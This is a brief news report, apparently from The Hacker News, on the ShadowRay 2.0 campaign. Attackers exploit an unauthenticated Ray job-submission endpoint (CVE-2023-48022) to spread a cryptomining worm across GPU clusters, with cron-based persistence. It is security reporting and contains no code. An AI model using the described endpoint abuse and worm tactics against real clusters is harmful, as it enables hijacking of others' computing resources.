"Oligo Security has warned of ongoing attacks exploiting a two-year-old security flaw in the Ray open-source artificial intelligence (AI) framework to turn infected clusters with NVIDIA GPUs into a self-replicating cryptocurrency mining botnet. The activity, codenamed ShadowRay 2.0, is an evolution of a prior wave that was observed between September 2023 and March 2024. The attack, at its core, exploits a critical missing authentication bug (CVE-2023-48022, CVSS score: 9.8) to take control of susceptible instances and hijack their computing power for illicit cryptocurrency mining using XMRig. The vulnerability has remained unpatched due to a " long-standing design decision" that's consistent with Ray's development best practices, which requires it to be run in an isolated network and act upon trusted code."
"The campaign involves submitting malicious jobs, with commands ranging from simple reconnaissance to complex multi-stage Bash and Python payloads, to an unauthenticated Ray Job Submission API ("/api/jobs/") on exposed dashboards. The compromised Ray clusters are then used in spray and pray attacks to distribute the payloads to other Ray dashboards, creating a worm that can essentially spread from one victim to another."
ShadowRay 2.0 leverages a missing authentication vulnerability (CVE-2023-48022, CVSS 9.8) in the Ray open-source AI framework to seize NVIDIA GPU clusters and run XMRig for illicit cryptocurrency mining. Attackers submit malicious jobs to an unauthenticated Ray Job Submission API to execute reconnaissance and multi-stage Bash/Python payloads, then pivot laterally to non-internet-facing nodes. Compromised clusters spray payloads to other exposed dashboards, enabling worm-like propagation. The campaign uses GitLab and GitHub repositories to host malware, adapts after takedowns, and establishes persistence via cron jobs that run every 15 minutes to pull updates and maintain access.
Read at The Hacker News
Unable to calculate read time
Collection
[
|
...
]